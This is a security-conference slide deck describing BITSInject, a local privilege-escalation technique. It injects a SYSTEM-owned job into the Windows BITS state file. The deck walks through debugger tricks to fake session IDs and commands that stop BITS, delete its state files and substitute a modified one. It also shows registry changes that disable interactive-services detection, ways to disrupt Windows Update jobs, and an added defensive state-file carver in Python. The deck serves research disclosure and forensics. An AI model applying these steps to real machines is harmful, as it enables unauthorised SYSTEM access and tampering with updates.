BITSInject: Control your BITS, get SYSTEM
Dor Azouri, Security Researcher @SafeBreach

Background Intelligent Transfer Service
A couple more bits about BITS
● Available since 2001 (Windows XP)
● Most known use: Windows Update
● Advanced features
DEMO: software updating itself using BITS

TOOL DEMO #1: BITSInject opens an interactive shell as NT AUTHORITY\SYSTEM, in session 0
BITS Background & Terms
● Clients: PowerShell, bitsadmin, 3rd-party
● BITS Job types: Download, Upload, Upload-Reply
● COM Interfaces (C/C++): qmgrprxy.dll, qmgr.dll
● State File
Known Malicious Uses
● BITS as a malware downloader
● As a persistence mechanism (e.g. DNSChanger/Zlob.Q)
● As C&C communication
The inspiration? The way WU downloads and installs updates.
The drive? Jealousy... of how WU adds SYSTEM jobs.
Some of LocalSystem Privileges
● Can open the registry keys HKLM\SECURITY and SAM
● On a DC: has unrestricted access to AD Domain Services
● Has the network privileges of the machine
● Covert identity

Some of LocalSystem Privileges
[SYSTEM whoami] - [Administrator whoami] =
  SeAssignPrimaryTokenPrivilege
  SeLockMemoryPrivilege
  SeTcbPrivilege
  SeCreatePermanentPrivilege
  SeAuditPrivilege
The Abuse

The Enabling Feature: SetNotifyCmdLine
Naive Try - PSEXEC
  bitsadmin /CREATE I_WANT_YOUR_SYSTEM
  bitsadmin /ADDFILE I_WANT_YOUR_SYSTEM http://site.com/software.exe c:\temp\software.exe

God Created a Rock He Can't Pick Up
  Unable to add file to job - 0x800704dd
  The operation being requested was not performed because the user has not logged on to the network
  bitsadmin /CANCEL I_WANT_YOUR_SYSTEM
How does wuaueng do the things it does?
CoSwitchCallContext to the COM interface of qmgr.dll:
  qmgr!CJobManagerExternal::CreateJob
  -> qmgr!CJob::AddFile
  -> qmgr!CJob::Resume
  -> qmgr!CJob::Transfer
  -> qmgr!CJob::BeginDownload
Going after wuaueng: compare the flow of calls between wuaueng and bitsadmin
1. qmgr!CJobManagerExternal::CreateJob -- identical
2. qmgr!CJobExternal::AddFile -- identical, but an exception is thrown here (0x800704dd)
   Reason: bad pairing of {Client SID} and {Session ID}
   Solution: fake the {Session ID}
Checkpoint #1 - AccessCheck
● One of the functions at the heart of the Windows security model
● It is boolean: GRANT or DENY
● IServerSecurity::CoImpersonateClient ➔ the impersonation token is checked against the job's security descriptor ➔ IServerSecurity::CoRevertToSelf
Checkpoint #2 - Active Logon
BITS requires the requesting user to be logged on for a job to continue operation.

  C:\Windows\system32>qwinsta
   SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
                                              0  Disc
  >console                                    1  Active
   rdp-tcp                                65536  Listen
Faking Session ID
  {Client SID} = {Session ID} = 1 (from the Job object)
  GetTokenInformation(12)
  SwitchToLogonToken
  CloneUserToken
  CLoggedOnUsers::FindUser({SID}, ...) in {Session ID}
  ➔ {SYSTEM} is NOT logged on in session {1}
Faking Session ID
1. A breakpoint is placed just before the call to CJobManager::CloneUserToken
2. Run CMD/PowerShell as SYSTEM using psexec:
     bitsadmin /create I_WANT_YOUR_SYSTEM
     bitsadmin /addfile I_WANT_YOUR_SYSTEM <URL> <DestinationFile>
3. The breakpoint is hit. Change the return value of the GetTokenInformation call to 0, which is the SYSTEM session ID (WinDbg memory change: [rsp+20h]=0)
Faking Session ID
  {Client SID} = {Session ID} = 0 (from the Job object, after the change)
  GetTokenInformation(12)
  SwitchToLogonToken
  CloneUserToken
  CLoggedOnUsers::FindUser({SID}, ...) in {Session ID}
CNestedImpersonation::* takes care of the token manipulations
  CNestedImpersonation::Impersonate(void) uses ImpersonateLoggedOnUser(HANDLE hToken)
  ➔ The desired action runs under impersonation, and then reverts back to self

Job states (C#):
  public enum JOB_STATE {
      Queued,
      Connecting,
      Transferring,
      Suspended,
      Error,
      TransientError,
      Transferred,
      Acknowledged,
      Cancelled,
      Unknown
  };
The State File is the Supervisor
● Represents the job queue
● C:\ProgramData\Microsoft\Network\Downloader\(qmgr0.dat|qmgr1.dat)
● Alternated update; the current one is recorded in HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS\StateIndex

The State File
● Straight-forward, e.g. the string representation of "SYSTEM":
    07 00 00 00 'S' 00 'Y' 00 'S' 00 'T' 00 'E' 00 'M' 00 00 00
  CJob::Serialize(class CQmgrWriteStateFile &) calls CQmgrStateFiles::Write(void const *, ulong) for each job property
● Unencrypted
● Partially protected
Replacing the state file:
  sc stop bits
  timeout 5
  del /Q /F C:\ProgramData\Microsoft\Network\Downloader\*
  >> Put the modified state file in place
  sc start bits
Integrity levels
  SID            Name (Level)   Use
  S-1-16-0x0     Untrusted (0)  Used by processes started by the Anonymous group. It blocks most write access.
  S-1-16-0x1000  Low (1)        Used by Protected Mode Internet Explorer.
  S-1-16-0x2000  Medium (2)     Used by normal applications being launched while UAC is enabled.
  S-1-16-0x3000  High (3)       Used by applications launched through UAC elevation, or if UAC is disabled and the user is an administrator.
  S-1-16-0x4000  System (4)     Used by services and other system-level applications (Wininit, Winlogon, Smss...).
Migration of the Queue: just copy-paste the state files between machines
  Windows 7 header:  F5 6A 19 2B 7C 00 8F 43 8D 12 1C FC A4 CC 9B 76
  Windows 10 header: 28 32 ED 09 A6 C7 E9 45 8F 6D 36 D9 46 C2 7C 3E 00 00 00 00 00 00 00 00
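The two slides above give a defender everything needed for a small forensic helper: the version-specific header bytes that open qmgr0.dat/qmgr1.dat, and the string serialization (a uint32 code-unit count including the terminating NUL, followed by UTF-16LE text and 00 00). The following is an added example, not code from the deck or from the BITSInject repository. It identifies which header a state-file image carries, carves every length-prefixed UTF-16LE string from it without knowing the job and queue record layout, and flags URLs and local .exe paths for review. The string format is generalized from the single 'SYSTEM' example on the slides, the triage rules are this example's own heuristics, and the input buffer is constructed inline rather than taken from a real state file.

```python
import struct
from typing import List, Optional, Tuple

# State file header bytes as listed on the slides (first 16 bytes of qmgr0.dat / qmgr1.dat).
STATE_FILE_HEADERS = {
    "Windows 7": bytes.fromhex("F56A192B7C008F438D121CFCA4CC9B76"),
    "Windows 10": bytes.fromhex("2832ED09A6C7E9458F6D36D946C27C3E"),
}


def identify_state_file(data: bytes) -> Optional[str]:
    """Return the Windows version whose known header the buffer starts with, else None."""
    for version, magic in STATE_FILE_HEADERS.items():
        if data.startswith(magic):
            return version
    return None


def encode_state_string(text: str) -> bytes:
    """Serialize a string the way the slides show it: uint32 code-unit count (including the
    terminating NUL), then UTF-16LE code units, then 00 00. Used here only to build the sample."""
    units = text.encode("utf-16-le")
    return struct.pack("<I", len(units) // 2 + 1) + units + b"\x00\x00"


def carve_state_strings(data: bytes, min_units: int = 2, max_units: int = 4096) -> List[Tuple[int, str]]:
    """Carve every length-prefixed UTF-16LE string from a state file image.

    The slides do not document the surrounding job/queue record layout, so this walks the
    buffer byte by byte and accepts a candidate only when the count is plausible, the run
    ends in a NUL code unit and the decoded text is printable. Returns (offset, text) pairs.
    """
    found: List[Tuple[int, str]] = []
    i, n = 0, len(data)
    while i + 4 <= n:
        count = struct.unpack_from("<I", data, i)[0]
        end = i + 4 + 2 * count
        if min_units <= count <= max_units and end <= n and data[end - 2:end] == b"\x00\x00":
            try:
                text = data[i + 4:end - 2].decode("utf-16-le")
            except UnicodeDecodeError:
                text = ""
            if text and text.isprintable():
                found.append((i, text))
                i = end  # skip the whole string so its body is not re-scanned
                continue
        i += 1
    return found


def triage_strings(strings: List[Tuple[int, str]]) -> List[Tuple[int, str, str]]:
    """Heuristic triage (an assumption of this example, not a documented BITS rule): remote
    URLs are transfer sources; local paths ending in .exe deserve a look because a job's
    destination file and its SetNotifyCmdLine program both appear as plain strings."""
    findings = []
    for offset, text in strings:
        lowered = text.lower()
        if lowered.startswith(("http://", "https://")):
            findings.append((offset, "remote url", text))
        elif lowered.endswith(".exe"):
            findings.append((offset, "local executable", text))
    return findings


# Constructed sample: Windows 10 header, the 8 zero bytes shown after it on the slide, a made-up
# job counter, then four strings modelled on the deck's own demo job. Not a real qmgr0.dat.
SAMPLE_STATE_FILE = (
    STATE_FILE_HEADERS["Windows 10"]
    + b"\x00" * 8
    + struct.pack("<I", 3)
    + encode_state_string("SYSTEM")
    + encode_state_string("I_WANT_YOUR_SYSTEM")
    + encode_state_string("http://site.com/software.exe")
    + encode_state_string("c:\\temp\\software.exe")
)


def analyze(data: bytes) -> dict:
    """Summarize a state file image: header version, carved strings and triage findings."""
    strings = carve_state_strings(data)
    return {
        "version": identify_state_file(data),
        "strings": [text for _, text in strings],
        "findings": triage_strings(strings),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_STATE_FILE)
    print("header:", report["version"])
    for offset, text in carve_state_strings(SAMPLE_STATE_FILE):
        print(f"  0x{offset:04x}  {text}")
    for offset, kind, text in report["findings"]:
        print(f"flag  0x{offset:04x}  {kind}: {text}")
```

Run against a real image, the carver is only a first pass: it recovers owner names, display names, URLs and paths but not which job each belongs to, so a hit such as a SYSTEM-owned job with a local executable string still has to be matched against `bitsadmin /list /allusers /verbose` or the parser in the BITSInject repository before drawing conclusions.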
A Cleaner Method: state file layout
  Version-dependent header
  State file header
  Queue header
  Jobs counter = n (n++ when a job is injected)
  Job header, Job #0, Job footer
  Job header, Job #x, Job footer
  ...
  Job header, Job #n, Job footer
  Queue footer

BITSInject
● Injects a job with LocalSystem as owner
● The job is removed when finished
● Allows editing some of the job's parameters, more in the future
Interactive Services Detection - UI0Detect
  sc stop UI0Detect
  reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows /v NoInteractiveServices /t REG_DWORD /d 1 /f
  sc start UI0Detect
OR: a non-interactive exe

TOOL DEMO #2: BITSInject non-interactive command

SimpleBITSServer
● A simple Python implementation of a BITS server
● Can respond without a Content-Length header
● Accelerates the method by pushing the job into the ERROR state
  * On Windows 10: fake VSN to avoid network traffic

The Enabling Conditions
● Relying on state file data without verification
● Lack of unique machine identification
● File permissions integrity
● Clear, straight-forward object serialization to disk
Other Potential Abuses: interfere with a software update job
1. WU-choking using file name exhaustion:
     C:\Windows\SoftwareDistribution\Download\GUID\BIT[0-9A-F]{1,4}\.tmp
   69,904 possible names (16 + 256 + 4,096 + 65,536)
2. Change a job's state using BITSInject.py
3. Completely remove a job from the queue using BITSInject.py
MSRC: "...A malicious administrator can do much worse things."

Links
  BITSInject (tool code + parser): https://github.com/SafeBreach-Labs/BITSInject
  SimpleBITSServer: https://github.com/SafeBreach-Labs/SimpleBITSServer
  Email: dor.azouri@safebreach.com
  Twitter: @bemikre